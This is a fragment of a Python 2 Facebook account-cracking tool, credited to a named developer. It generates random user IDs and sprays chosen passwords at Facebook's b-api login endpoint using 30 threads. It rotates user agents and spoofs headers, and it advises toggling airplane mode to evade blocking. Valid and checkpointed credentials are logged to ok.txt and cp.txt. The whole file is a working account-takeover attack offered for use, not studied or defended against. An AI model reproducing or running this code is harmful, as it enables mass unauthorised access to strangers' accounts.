											print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass8
											ok.append(uid + ' | ' + pass8)
											save = open('out/ok.txt', 'a')
											save.write(' ' + uid + ' | ' + str(pass8) + '\n')
											save.close()
										elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
											print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass8
											cp.append(uid + ' | ' + pass8)
											save = open('out/cp.txt', 'a')
											save.write(' ' + str(uid) + ' | ' + str(pass8) + '\n')
											save.close()
		except:
			pass
	p = ThreadPool(30)
	p.map(main, id)
	print ('•-----------------------------------------------•')
	print(' • Completed')
	print(' • Total ✓/×/ : '+str(len(ok))+' • '+str(len(cp)))
	print ('•-----------------------------------------------•')
	raw_input(' • Go back')
	my_menu()
def random9():
	os.system('clear')
	print logo
	print
	print '  \033[1;97m[\033[1;92m01\033[1;97m] 2009 Account cloning '
	print '  \033[1;97m[\033[1;92m00\033[1;97m] Go Back'
	print
	random()
class Somi:
	def __init__(self):
		self.id = []
		self.ok = []
		self.cp = []
		self.loop = 0 
	def __menu__(self):
		os.system("clear")
		print("\n    \033[1;93m  _________________      _____  .___ \n    \033[1;93m /   _____/\_____  \    /     \ |   |\n    \033[1;96m \_____  \  /   |   \  /  \ /  \|   |\n    \033[1;96m /        \/    |    \/    Y    \   |\n    \033[1;91m/_______  /\_______  /\____|__  /___|\n    \033[1;91m       \033[1;93m \/\033[1;91m         \033[1;96m\/\033[1;91m         \033[1;95m\/     \033[1;90m\n•-----------------------------------------------•\n\033[1;91m•\033[1;97m> Developer  •   Somi Awan\n\033[1;91m•\033[1;97m> WhatsApp   •   03455453538\n\033[1;91m•\033[1;97m> Facebook   •   Somi Awan\n\033[1;90m•-----------------------------------------------•\n        *\033[1;91mDon't stop chasing your dreams\033[1;90m*\n            *\033[1;91mWe are back in the game\033[1;90m*\n\033[1;90m•-----------------------------------------------•")

		print("\n  \033[1;92m[\033[1;91m1\033[1;92m]\x1b[1;97m B-Api Cloning\033[1;97m [very fast]")
		print("\n  \033[1;92m[\033[1;91m1\033[1;92m]\x1b[1;97m Mbasic Cloning\033[1;97m [fast]")
		choose =raw_input("\n  \033[1;92m[\033[1;91m*\033[1;92m]\x1b[1;97m Choose Option :  ")
		if choose in [""]:
			print(" [!] Sorry Your Choice Wrong")
			Somi().__menu__()
		elif choose in ["1", "01"]:
			self.__fb__()
		elif choose in ["1", "01"]:
			self.__fbb__()
		else:
			Somi().__menu__()
	
	def __fb__(self):
		x = 11111111
		xx = 99999999
		idx = "1000000" 
		limit = int(input("  \033[1;92m[\033[1;95m+\033[1;92m]\x1b[1;97m Enter the number of id (e.g 5000): "))
		try:
			for i in range(limit):
				i = random.randint(x,xx)
				ib = idx
				self.id.append(ib+str(i))
			print("  \033[1;92m[\033[1;94m✓\033[1;92m]\x1b[1;97m Total id -> \033[0;91m%s\033[0;97m"%(len(self.id))) 
			with ThreadPoolExecutor(max_workers=30) as coeg:
				print("\n  \033[1;92m[\033[1;93m*\033[1;92m]\x1b[1;97m For example separators : 123456,123456789")
				listpass = raw_input("  \033[1;92m[\033[1;96m?\033[1;92m]\x1b[1;97m Enter password : ")
				if len(listpass)<=5:
					exit("\n  [!] password minimum 6 characters")
				print("  \033[1;92m[\033[1;93m*\033[1;92m]\x1b[1;97m crack with password -> [\033[0;91m%s\033[0;97m]"%(listpass))
				print("\n  \033[1;92m[\033[1;94m✓\033[1;92m]\x1b[1;97m ok result saved in -> ok.txt")
				print("  \033[1;92m[\033[1;94m✓\033[1;92m]\x1b[1;97m cp result saved in -> cp.txt")
				print("  \033[1;92m[\033[1;91m!\033[1;92m]\x1b[1;97m if no result turn on airplane mode 5 seconds\n")
				for user in self.id:
					coeg.submit(self.__api__, user, listpass.split(","))
			exit("\n\n [#] crack selesai...")
		except Exception as e:
			exit(str(e))
	
	def __api__(self, uid, pwx):
		ua = random.choice([
			"Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z007;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]", 
			"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"
			'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)',
			'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',
			'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36',
			'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0',
			'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36',
			'Mozilla/5.0 (Windows IoT 10.0; Android 6.0.1; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Mobile Safari/537.36 Edge/17.17134',
			'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',
			'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
		])
		sys.stdout.write(
			"\r  [*] crack: %s/%s -> ok:-%s - cp:-%s "%(self.loop, len(self.id), len(self.ok), len(self.cp))
		); sys.stdout.flush()
		for pw in pwx:
			pw = pw.lower()
			ses = requests.Session()
			headers = {
				"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), 
				"x-fb-sim-hni": str(random.randint(20000, 40000)), 
				"x-fb-net-hni": str(random.randint(20000, 40000)), 
				"x-fb-connection-quality": "EXCELLENT",
				"x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",
				"user-agent": ua, 
				"content-type": "application/x-www-form-urlencoded", 
				"x-fb-http-engine": "Liger"
			}
			response = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20&currently_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers) 
			if "session_key" in response.text and "EAAA" in response.text:
				print("\r  \033[0;92m* --> %s|%s\033[0;97m         "%(uid, pw))
				self.ok.append("%s|%s"%(uid, pw))
				open("ok.txt","a").write("  * --> %s|%s\n"%(uid, pw))
				break
			elif "www.facebook.com" in response.json()["error_msg"]:
				print("\r  \033[0;93m* --> %s|%s\033[0;97m         "%(uid, pw))
				self.cp.append("%s|%s"%(uid, pw))
				open("cp.txt","a").write("  * --> %s|%s\n"%(uid, pw))
				break
			else:
				continue

		self.loop +=1



if __name__ == '__main__':
	os.system('git pull')
	apikey()
